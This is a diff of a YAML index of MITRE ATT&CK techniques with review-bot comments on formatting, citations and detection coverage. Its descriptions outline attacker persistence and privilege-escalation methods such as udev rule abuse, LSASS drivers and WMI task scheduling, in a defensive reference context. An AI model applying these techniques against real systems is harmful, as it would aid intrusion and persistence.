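Review bot: the added description lines for T1055.015 contain bare line breaks immediately after `SysListView32`, `FindWindow` and `EnumWindows` (the removed lines had the same), which look like stripped inline-code markup rather than intended wrapping; inside a double-quoted YAML scalar a line break folds to a single space, so the file still parses but the rendered text reads "SysListView32 control" and "FindWindow and/or EnumWindows )" with stray spacing. Most of the `-` lines in this hunk (platforms, domains, contributors, id, created, external_references) are re-added in a later hunk rather than deleted, so the substantive change is the new `(Citation: Hexacorn Listplanting)` plus a key reorder; emitting keys in a stable order from the generator would keep diffs like this reviewable.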
@@ -23999,6 +24229,9 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - ESET
+ x_mitre_deprecated: false
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -24013,21 +24246,52 @@ privilege-escalation:
arguments.\n\nAnalyze process behavior to determine if a process is performing
unusual actions, such as opening network connections, reading files, or other
suspicious actions that could relate to post-compromise behavior. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Modification'
- 'Process: OS API Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+ created: '2021-11-22T15:02:15.190Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1055/015
+ external_id: T1055.015
+ - source_name: Hexacorn Listplanting
+ description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+ trick. Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+ - source_name: ESET InvisiMole June 2020
+ description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+ HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+ - source_name: Microsoft List View Controls
+ description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+ January 4, 2022.
+ url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+ - source_name: Modexp Windows Process Injection
+ description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+ Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+ Retrieved November 15, 2021.'
+ url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1055.015
atomic_tests: []
T1484:
technique:
- modified: '2024-04-19T04:27:31.884Z'
+ modified: '2024-10-15T15:55:32.946Z'
name: Domain or Tenant Policy Modification
description: "Adversaries may modify the configuration settings of a domain
or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -24072,9 +24336,8 @@ privilege-escalation:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '3.0'
+ - Identity Provider
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Deletion'
- 'Active Directory: Active Directory Object Creation'
@@ -24131,8 +24394,8 @@ privilege-escalation:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Sygnia Golden SAML
description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
Attack. Retrieved January 6, 2021.
@@ -24141,7 +24404,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.008:
technique:
@@ -24183,7 +24445,7 @@ privilege-escalation:
Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:34:43.405Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: LSASS Driver'
x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -24208,12 +24470,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.008
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -24253,8 +24514,10 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -24262,13 +24525,13 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -24299,17 +24562,14 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
@@ -24372,7 +24632,7 @@ privilege-escalation:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
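Review bot: the T1053.002 description added earlier in this diff now states that a job can be scheduled through the `Win32_ScheduledJob` WMI class without ever running the `at` command, but the data sources in this hunk are unchanged (`Command: Command Execution`, `Scheduled Job: Scheduled Job Creation`). Detection content keyed only on the first source will miss the WMI path; only the second covers it, so any atomic test added for the WMI variant should say so in its detection guidance, and the version bump alone does not surface that gap.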
@@ -24406,8 +24666,8 @@ privilege-escalation:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -24416,6 +24676,10 @@ privilege-escalation:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
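Review bot: the new `Malicious Life by Cybereason` reference URL ends in a `#blog-subscribe` fragment that targets the page's subscribe widget rather than the article; drop the fragment so the link lands on the content. The `description` also records the date as `(n.d.)` while the retrieval date is June 19, 2024; if the post carries a publication date it should be filled in upstream.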
@@ -24428,7 +24692,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests: []
T1055.001:
@@ -24531,9 +24794,67 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.001
atomic_tests: []
+ T1546.017:
+ technique:
+ modified: '2024-11-11T19:05:38.708Z'
+ name: Udev Rules
+ description: |-
+ Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+ Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Eduardo González Hernández (@codexlynx)
+ - Eder Pérez Ignacio, @ch4ik0
+ - Wirapong Petshagun
+ - "@grahamhelton3"
+ - Ruben Groenewoud, Elastic
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+ in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+ specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+ 2024) '
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+ created: '2024-09-26T17:02:09.888Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/017
+ external_id: T1546.017
+ - source_name: Ignacio Udev research 2024
+ description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+ persistence. Retrieved September 26, 2024.
+ url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+ - source_name: Elastic Linux Persistence 2024
+ description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+ - A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+ url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+ - source_name: Reichert aon sedexp 2024
+ description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+ Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+ url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1546.007:
technique:
x_mitre_platforms:
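Review bot: in the new T1546.017 entry the `x_mitre_detection` string lists only three rule directories and omits `/run/udev/rules.d/` and `/usr/local/lib/udev/rules.d/`, both of which the entry's own description names as writable rule locations, so file-monitoring built from the detection text alone would miss two of the five paths; it also backticks two paths but not `/usr/lib/udev/rules.d/`, and the single-quoted scalar ends with a trailing space before the closing quote (`2024) '`). Separately, this entry has no `identifier: T1546.017` line before `atomic_tests: []`, while T1098.002, T1037.001, T1055.015, T1078.004 and T1053.002 in this diff do carry `identifier:` (T1548.006 and T1484 also lack it), so the generator's handling of that key is inconsistent and any downstream code that reads it should be checked. The wording points are upstream ATT&CK text and belong in an upstream issue rather than a hand edit here.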
@@ -24569,7 +24890,7 @@ privilege-escalation:
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh
.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:09:17.363Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Netsh Helper DLL'
x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -24593,12 +24914,11 @@ privilege-escalation:
- SYSTEM
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.007
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -24682,11 +25002,10 @@ privilege-escalation:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -24738,9 +25057,8 @@ privilege-escalation:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
T1574.012:
@@ -24789,7 +25107,7 @@ privilege-escalation:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -24827,30 +25145,29 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
execution:
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
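Review bot: the rewritten description introduces two new citation keys, (Citation: Stack Overflow) and (Citation: Red Canary - Atomic Red Team), which only resolve if matching source_name entries exist in this object's external_references; the hunks further down at +25261 and +25277 add both, so the object stays consistent, but a generator-side check that every (Citation: X) in a description has a source_name X in the same object would catch the case where the two get out of step. Also worth confirming that the removed paragraph on the deprecated at utility (with its link to T1053/002) was dropped upstream and is not an artifact of how the description was re-wrapped.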
@@ -24897,7 +25214,7 @@ execution:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -24929,8 +25246,8 @@ execution:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -24944,6 +25261,10 @@ execution:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -24956,16 +25277,19 @@ execution:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1047:
technique:
- modified: '2024-04-11T18:13:25.130Z'
+ modified: '2024-10-15T15:20:57.328Z'
name: Windows Management Instrumentation
description: |-
Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
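Review bot: spec_version: '2.1' is dropped from T1053.005 here with nothing replacing it, and the same removal recurs for every technique object in this patch. If the index is now built from a bundle whose objects carry no per-object spec_version that is expected, but it is a silent schema change for anything that reads the index, so it would be good to state it in the PR description and confirm that the loader and the docs templates do not reference the key.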
@@ -25031,7 +25355,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1047
atomic_tests: []
T1129:
@@ -25108,66 +25431,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1129
atomic_tests: []
T1059.007:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Cody Thomas, SpecterOps
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
- type: attack-pattern
- created: '2020-06-23T19:12:24.924Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1059.007
- url: https://attack.mitre.org/techniques/T1059/007
- - source_name: NodeJS
- url: https://nodejs.org/
- description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
- - source_name: JScrip May 2018
- url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
- description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
- June 23, 2020.
- - source_name: Microsoft JScript 2007
- url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
- description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
- ECMAScript …. Retrieved June 23, 2020.
- - source_name: Microsoft Windows Scripts
- url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
- description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
- June 23, 2020.
- - source_name: Apple About Mac Scripting 2016
- url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
- description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
- 14, 2021.
- - source_name: SpecterOps JXA 2020
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
- 2021.
- - source_name: SentinelOne macOS Red Team
- url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
- description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
- APIs Without Building Binaries. Retrieved July 17, 2020.'
- - source_name: Red Canary Silver Sparrow Feb2021
- url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
- description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
- wings: Outing macOS malware before it takes flight. Retrieved April 20,
- 2021.'
- - source_name: MDSec macOS JXA and VSCode
- url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
- description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
- with VSCode Extensions. Retrieved April 20, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-07-30T14:12:52.698Z'
name: 'Command and Scripting Interpreter: JavaScript'
description: |-
Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
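Review bot: almost all of the removed lines here (x_mitre_platforms, x_mitre_domains, x_mitre_contributors, object_marking_refs, id, type, created, created_by_ref and the whole external_references list) reappear unchanged, or only re-ordered, in the next hunk at +25448; the real delta for T1059.007 is a handful of scalar values. Emitting keys in a fixed order from the generator, and keeping external_references in upstream order, would make these regenerations reviewable, since right now the churn hides the value changes.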
@@ -25180,31 +25448,83 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_contributors:
+ - Cody Thomas, SpecterOps
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
Monitor for execution of JXA through osascript
and usage of OSAScript
API that may be related to other suspicious behavior occurring on the system.
